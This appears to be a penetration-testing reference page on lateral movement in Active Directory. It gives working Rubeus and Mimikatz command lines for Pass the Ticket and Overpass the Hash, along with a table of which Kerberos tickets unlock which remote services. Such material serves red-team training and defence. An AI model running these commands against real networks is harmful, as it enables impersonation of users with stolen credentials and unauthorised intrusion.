Links

Lateral Movement

Introduction

In this section, you will find some techniques in order to perform lateral movements on Active Directory infrastructuree.

Pass The Ticket (PTT)

In the Pass the Ticket technique, an attacker obtains a valid Kerberos ticket-granting ticket (TGT) by stealing it from a user or extracting it from a computer's memory. The attacker can then use this TGT to request additional service tickets without the need for any further authentication.
You can perform this technique with Rubeus.
.\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:<DOMAIN> /username:<USERNAME> /password:FakePass123 /ticket:<TICKET>
Depending on the ticket you have you can do certain tasks.

Tickets - Techniques

Service Type
Required Tickets
Windows File Share (PsExec)
CIFS
LDAP Operations (DSync)
LDAP
WinRM
HOST HTTP WINRM
WMI
HOST RPCSS
Powershell Remoting
HOST HTTP Depending on OS: WSMAN RPCSS
Schedule Taks
Host
Windows Remote Server Administration Tools
RPCSS LDAP CIFS
Golden Tickets
krbtgt

Overpass The Hash (OTH)

This technique allows requesting a Kerberos TGT from a user using their NTLM or AES/RC4 hash.
  • Does not require high privileges
.\Rubeus.exe asktgt /nowrap /user:<USER> [/ntlm:<HASH_NTLM>|/aes256:<AES256_KEY>|/rc4:<RC4_KEY>] /opsec /show /ptt createnetonly /program:C:\Windows\System32\cmd.exe
  • Requires high privileges
Invoke-Mimikatz -Command '"sekurlsa::pth /user:<USER2IMPERSONATE> /domain:<DOMAIN> /aes256:<aes256key> run:powershell.exe"'
SafetyKatz.exe "sekurlsa::pth /user:<USER2IMPERSONATE> /domain:<DOMAIN> /aes256:<aes256keys> /run:cmd.exe" "exit"

S4U2Self Abuse (Constrained Delegation)

The exploitation is seen on the Kerberos exploitation phase.

Alternate Service Name (Constrained Delegation)

The exploitation is seen on the Kerberos exploitation phase.

References